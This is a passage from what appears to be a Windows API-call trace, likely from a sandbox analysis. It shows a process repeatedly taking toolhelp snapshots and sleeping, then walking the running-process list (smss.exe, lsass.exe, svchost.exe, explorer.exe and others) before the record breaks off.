cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0168.877] Sleep (dwMilliseconds=0x64) [0168.879] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0168.925] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.072] Sleep (dwMilliseconds=0x64) [0169.096] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0169.129] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.306] Sleep (dwMilliseconds=0x64) [0169.359] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0169.491] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.663] Sleep (dwMilliseconds=0x64) [0169.694] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0169.725] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.889] Sleep (dwMilliseconds=0x64) [0169.932] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0169.993] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.110] Sleep (dwMilliseconds=0x64) [0170.200] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0170.211] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.391] Sleep (dwMilliseconds=0x64) [0170.435] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0170.489] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.651] Sleep (dwMilliseconds=0x64) [0170.693] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0170.704] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.833] Sleep (dwMilliseconds=0x64) [0170.835] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0170.850] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.008] Sleep (dwMilliseconds=0x64) [0171.044] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0171.095] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.290] Sleep (dwMilliseconds=0x64) [0171.334] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0171.351] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.508] Sleep (dwMilliseconds=0x64) [0171.524] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0171.593] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.783] Sleep (dwMilliseconds=0x64) [0171.826] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0171.838] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.019] Sleep (dwMilliseconds=0x64) [0172.071] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0172.085] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.341] Sleep (dwMilliseconds=0x64) [0172.380] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0172.391] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.516] Sleep (dwMilliseconds=0x64) [0172.558] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0172.570] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.727] Sleep (dwMilliseconds=0x64) [0172.747] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0172.794] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.015] Sleep (dwMilliseconds=0x64) [0173.058] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0173.072] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.281] Sleep (dwMilliseconds=0x64) [0173.282] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0173.331] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.491] Sleep (dwMilliseconds=0x64) [0173.507] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0173.524] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.663] Sleep (dwMilliseconds=0x64) [0173.674] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0173.685] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.769] Sleep (dwMilliseconds=0x64) [0173.800] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0173.812] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.898] Sleep (dwMilliseconds=0x64) [0173.902] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0173.922] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.997] Sleep (dwMilliseconds=0x64) [0173.998] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0174.009] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.400] Sleep (dwMilliseconds=0x64) [0174.655] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0174.669] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.361] Sleep (dwMilliseconds=0x64) [0175.369] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0175.418] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.629] Sleep (dwMilliseconds=0x64) [0175.662] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0175.690] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.897] Sleep (dwMilliseconds=0x64) [0175.937] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0175.954] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.126] Sleep (dwMilliseconds=0x64) [0176.165] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0176.177] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.522] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0176.557] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.728] Sleep (dwMilliseconds=0x64) [0176.777] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0176.856] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.010] Sleep (dwMilliseconds=0x64) [0177.061] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0177.073] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.222] Sleep (dwMilliseconds=0x64) [0177.267] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0177.279] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.557] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0177.570] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.950] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0177.972] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.135] Sleep (dwMilliseconds=0x64) [0178.179] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0178.191] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.349] Sleep (dwMilliseconds=0x64) [0178.386] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0178.442] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.651] Sleep (dwMilliseconds=0x64) [0178.685] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0178.717] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.911] Sleep (dwMilliseconds=0x64) [0178.932] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20f0 [0178.961] Process32First (in: hSnapshot=0x20f0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.178] Sleep (dwMilliseconds=0x64) [0179.237] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0179.250] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.446] Sleep (dwMilliseconds=0x64) [0179.449] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0179.495] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.660] Sleep (dwMilliseconds=0x64) [0179.679] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0179.713] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.892] Sleep (dwMilliseconds=0x64) [0179.931] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0179.996] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0180.156] Sleep (dwMilliseconds=0x64) [0180.159] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0180.218] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0180.246] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0180.328] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0180.331] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0180.334] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0180.336] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0180.339] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0180.340] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0180.342] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0180.343] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.345] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.346] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0180.348] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.350] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.351] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.352] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.354] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.355] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.357] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.397] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0180.399] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0180.405] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0180.408] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: 